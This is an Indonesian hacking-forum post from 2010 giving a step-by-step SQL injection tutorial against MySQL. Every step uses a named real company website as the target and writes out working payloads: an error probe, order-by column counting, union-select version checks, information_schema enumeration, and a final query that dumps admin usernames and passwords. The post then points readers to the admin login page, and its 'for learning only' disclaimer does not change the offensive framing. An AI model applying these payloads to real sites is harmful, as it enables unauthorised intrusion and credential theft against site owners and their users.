SQL Injection Real Version (1)

Topik sebelumnya Topik selanjutnya Go down

SQL Injection Real Version (1)

Post  syafmovic007 on Wed Oct 06, 2010 12:29 am

nah Teman-teman sekalian... disini ane akan menerangkan tentang pembahasan basi menurut master diluar sana, tapi menurut ane sangat bagus untuk newbie(org baru) seperti ane

Pengertian sql injection:
SQL injection adalah sebuah aksi DEFACER/HACKING yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x, tidak support untuk mysql versi 4.x


===========
=step Satu:=
===========

carilah target
misal: http://www.hindustanimpex.co.in/products.php?catcode=1

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
http://www.hindustanimpex.co.in/products.php?catcode=1' atau
http://www.hindustanimpex.co.in/products.php?catcode=-1
sehingga muncul pesan error seperti berikut :
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/hind9098/public_html/products.php on line 61( dan masih banyak lagi)


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order+by

contoh:
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+1-- atau

ceklah secara step by step (satupersatu) untuk mengetahui vuln(kerusakan web itu)...
misal:


http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+1--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+2--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+3--
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+4--
lanjutin yach 5, 6, 7, 8, 9, 10

sehingga muncul error atau hilang pesan error...
http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+11--

berarti yang kita ambil adalah sampai angka 11
menjadi = http://www.hindustanimpex.co.in/products.php?catcode=-1+order+by+11--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union+select
karena tadi error sampai angka 11
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,2,3,4,5,6,7,8,9,10--


ok seumpama yg keluar angka 5
contoh versi : 5.0.89-community

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tersebut pada angka yg keluar tadi
misal: http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,version(),3,4,5,6,7,8,9,10--
atau
http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,@@version,3,4,5,6,7,8,9,10--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


===========
=step Empat:=
===========

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables--


untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- >>> dimasukan setelah angka terakhir


http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10+from+information_schema.tables+where+table_schema=database()--

=============
= step Lima: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah [color=red]+from+information_schema.columns+where+table_name=0xhexadecimal-- >>> dimasukan setelah angka terakhir

mejadi seperti :

http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x61646D696E

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.dolcevie.com/js/converter.html
http://centricle.com/tools/ascii-hex/


contoh kata yg ingin di konversi Ascii ke Hex yaitu admin maka akan menjadi 61:64:6d:69:6e jadi kayak gini.. titik dua dihapus>>>61646D696E



http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+from+information_schema.columns+where+table_name=0x61646D696E

============
=step Enam:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

http://www.hindustanimpex.co.in/products.php?catcode=-1+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8,9,10+from+(nama table berasal)--

contoh kata yang keluar adalah username,password

Contoh sitenya :
http://www.hindustanimpex.co.in/products.php?catcode=-1+UNION+SELECT+1,concat_ws(0x3a,username,0x3a,password),3,4,5,6,7,8,9,10+from+admin--

=============
=Step Tujuh:=
=============

username & password udah ditangan...
langsung cari page admin loginnya...
bisa cari dengan tool ini (http://tool-of-fudc.isgreat.org)
terserah mau diapain... tapi ingat diatas langit masih ada langit yang lebih tinggi


----------------------------------------------------------------------------------

NB : tutorial ini hanyalah untuk pembelajaran, hanya untuk melihat kelemahan suatu sistem, tidak untuk merusak sistem...
Creator : syafm0vic007
Team : i-TOFU(IT-Team Of Fatihul Ulum), CyberJihadCommunity, IndonesianHackerTeam, Devilzc0de, Jasakom, and all team hacker in Indonesian Smile
Thank's : All myFriend in Indonesian... love you all..
----------------------------------------------------------------------------------

syafmovic007
Pejuang
Pejuang

Jumlah posting : 63
Age : 25
Lokasi : ~#root | system32
Registration date : 25.02.09

Lihat profil user http://syafmovic007.blogspot.com

Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik